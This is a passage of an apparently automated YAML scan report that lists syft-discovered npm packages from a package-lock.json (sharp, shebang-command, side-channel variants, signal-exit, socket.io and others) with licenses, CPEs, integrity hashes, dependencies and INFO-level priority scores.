|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:setprototypeof:setprototypeof:1.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/setprototypeof@1.2.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/setprototypeof/-/setprototypeof-1.2.0.tgz
|
|
integrity: sha512-E5LDX7Wrp85Kil5bhZv46j8jOeboKq5JMmYM3gVGdGH8xFpPWXUMsNrlODCrkoxMEeNi/XZIwuRvY4XNwYMJpw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: fdeea92c74bf39fa
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: sharp 0.34.5'
|
|
title: sharp 0.34.5
|
|
description: 'Package discovered: sharp 0.34.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: f96d5af8de184f83
|
|
name: sharp
|
|
version: 0.34.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:sharp_project:sharp:0.34.5:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/sharp@0.34.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/sharp/-/sharp-0.34.5.tgz
|
|
integrity: sha512-Ou9I5Ft9WNcCbXrU9cMgPBcCK8LiwLqcbywW3t4oDV37n1pzpuNLsYiAV8eODnjbtQlSDwZ2cUEeQz4E54Hltg==
|
|
dependencies:
|
|
'@img/colour': ^1.0.0
|
|
detect-libc: ^2.1.2
|
|
semver: ^7.7.3
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: a0d820679cbb3cb7
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: shebang-command 2.0.0'
|
|
title: shebang-command 2.0.0
|
|
description: 'Package discovered: shebang-command 2.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 14d8b5cbe6162ddd
|
|
name: shebang-command
|
|
version: 2.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:shebang-command:shebang-command:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:shebang-command:shebang_command:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:shebang_command:shebang-command:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:shebang_command:shebang_command:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:shebang:shebang-command:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:shebang:shebang_command:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/shebang-command@2.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz
|
|
integrity: sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==
|
|
dependencies:
|
|
shebang-regex: ^3.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: f5b7b8efb70e19a9
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: shebang-regex 3.0.0'
|
|
title: shebang-regex 3.0.0
|
|
description: 'Package discovered: shebang-regex 3.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: b86e26fe1fc6c7c9
|
|
name: shebang-regex
|
|
version: 3.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:shebang-regex:shebang-regex:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:shebang-regex:shebang_regex:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:shebang_regex:shebang-regex:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:shebang_regex:shebang_regex:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:shebang:shebang-regex:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:shebang:shebang_regex:3.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/shebang-regex@3.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz
|
|
integrity: sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 6b555e361c3642d5
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: side-channel 1.1.0'
|
|
title: side-channel 1.1.0
|
|
description: 'Package discovered: side-channel 1.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: a236188908f1e843
|
|
name: side-channel
|
|
version: 1.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:side-channel:side-channel:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:side-channel:side_channel:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:side_channel:side-channel:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:side_channel:side_channel:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:side:side-channel:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:side:side_channel:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/side-channel@1.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/side-channel/-/side-channel-1.1.0.tgz
|
|
integrity: sha512-ZX99e6tRweoUXqR+VBrslhda51Nh5MTQwou5tnUDgbtyM0dBgmhEDtWGP/xbKn6hqfPRHujUNwz5fy/wbbhnpw==
|
|
dependencies:
|
|
es-errors: ^1.3.0
|
|
object-inspect: ^1.13.3
|
|
side-channel-list: ^1.0.0
|
|
side-channel-map: ^1.0.1
|
|
side-channel-weakmap: ^1.0.2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 890b23d99b8d3706
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: side-channel-list 1.0.1'
|
|
title: side-channel-list 1.0.1
|
|
description: 'Package discovered: side-channel-list 1.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 2e4a230ff21329f1
|
|
name: side-channel-list
|
|
version: 1.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:side-channel-list:side-channel-list:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:side-channel-list:side_channel_list:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:side_channel_list:side-channel-list:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:side_channel_list:side_channel_list:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:side-channel:side-channel-list:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:side-channel:side_channel_list:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:side_channel:side-channel-list:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:side_channel:side_channel_list:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:side:side-channel-list:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:side:side_channel_list:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/side-channel-list@1.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/side-channel-list/-/side-channel-list-1.0.1.tgz
|
|
integrity: sha512-mjn/0bi/oUURjc5Xl7IaWi/OJJJumuoJFQJfDDyO46+hBWsfaVM65TBHq2eoZBhzl9EchxOijpkbRC8SVBQU0w==
|
|
dependencies:
|
|
es-errors: ^1.3.0
|
|
object-inspect: ^1.13.4
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 6043652240bb3202
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: side-channel-map 1.0.1'
|
|
title: side-channel-map 1.0.1
|
|
description: 'Package discovered: side-channel-map 1.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 36c9d18daa63eabd
|
|
name: side-channel-map
|
|
version: 1.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:side-channel-map:side-channel-map:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:side-channel-map:side_channel_map:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:side_channel_map:side-channel-map:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:side_channel_map:side_channel_map:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:side-channel:side-channel-map:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:side-channel:side_channel_map:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:side_channel:side-channel-map:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:side_channel:side_channel_map:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:side:side-channel-map:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:side:side_channel_map:1.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/side-channel-map@1.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/side-channel-map/-/side-channel-map-1.0.1.tgz
|
|
integrity: sha512-VCjCNfgMsby3tTdo02nbjtM/ewra6jPHmpThenkTYh8pG9ucZ/1P8So4u4FGBek/BjpOVsDCMoLA/iuBKIFXRA==
|
|
dependencies:
|
|
call-bound: ^1.0.2
|
|
es-errors: ^1.3.0
|
|
get-intrinsic: ^1.2.5
|
|
object-inspect: ^1.13.3
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 6c276e4fe79d17b1
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: side-channel-weakmap 1.0.2'
|
|
title: side-channel-weakmap 1.0.2
|
|
description: 'Package discovered: side-channel-weakmap 1.0.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 3a35b0f8b53bc97a
|
|
name: side-channel-weakmap
|
|
version: 1.0.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:side-channel-weakmap:side-channel-weakmap:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:side-channel-weakmap:side_channel_weakmap:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:side_channel_weakmap:side-channel-weakmap:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:side_channel_weakmap:side_channel_weakmap:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:side-channel:side-channel-weakmap:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:side-channel:side_channel_weakmap:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:side_channel:side-channel-weakmap:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:side_channel:side_channel_weakmap:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:side:side-channel-weakmap:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:side:side_channel_weakmap:1.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/side-channel-weakmap@1.0.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/side-channel-weakmap/-/side-channel-weakmap-1.0.2.tgz
|
|
integrity: sha512-WPS/HvHQTYnHisLo9McqBHOJk2FkHO/tlpvldyrnem4aeQp4hai3gythswg6p01oSoTl58rcpiFAjF2br2Ak2A==
|
|
dependencies:
|
|
call-bound: ^1.0.2
|
|
es-errors: ^1.3.0
|
|
get-intrinsic: ^1.2.5
|
|
object-inspect: ^1.13.3
|
|
side-channel-map: ^1.0.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 8acef3cde3b7b132
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: signal-exit 4.1.0'
|
|
title: signal-exit 4.1.0
|
|
description: 'Package discovered: signal-exit 4.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: a63ea3d2efb32143
|
|
name: signal-exit
|
|
version: 4.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:signal-exit:signal-exit:4.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:signal-exit:signal_exit:4.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:signal_exit:signal-exit:4.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:signal_exit:signal_exit:4.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:signal:signal-exit:4.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:signal:signal_exit:4.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/signal-exit@4.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz
|
|
integrity: sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 9476a789ac7d80fb
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: simple-swizzle 0.2.4'
|
|
title: simple-swizzle 0.2.4
|
|
description: 'Package discovered: simple-swizzle 0.2.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: cef7b2b2b70b3db8
|
|
name: simple-swizzle
|
|
version: 0.2.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:simple-swizzle:simple-swizzle:0.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:simple-swizzle:simple_swizzle:0.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:simple_swizzle:simple-swizzle:0.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:simple_swizzle:simple_swizzle:0.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:simple:simple-swizzle:0.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:simple:simple_swizzle:0.2.4:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/simple-swizzle@0.2.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/simple-swizzle/-/simple-swizzle-0.2.4.tgz
|
|
integrity: sha512-nAu1WFPQSMNr2Zn9PGSZK9AGn4t/y97lEm+MXTtUDwfP0ksAIX4nO+6ruD9Jwut4C49SB1Ws+fbXsm/yScWOHw==
|
|
dependencies:
|
|
is-arrayish: ^0.3.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: ff9098f7bbabdf5b
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: socket.io 4.8.3'
|
|
title: socket.io 4.8.3
|
|
description: 'Package discovered: socket.io 4.8.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 5cc521e50bb4314d
|
|
name: socket.io
|
|
version: 4.8.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:socket:socket.io:4.8.3:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/socket.io@4.8.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/socket.io/-/socket.io-4.8.3.tgz
|
|
integrity: sha512-2Dd78bqzzjE6KPkD5fHZmDAKRNe3J15q+YHDrIsy9WEkqttc7GY+kT9OBLSMaPbQaEd0x1BjcmtMtXkfpc+T5A==
|
|
dependencies:
|
|
accepts: ~1.3.4
|
|
base64id: ~2.0.0
|
|
cors: ~2.8.5
|
|
debug: ~4.4.1
|
|
engine.io: ~6.6.0
|
|
socket.io-adapter: ~2.5.2
|
|
socket.io-parser: ~4.2.4
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
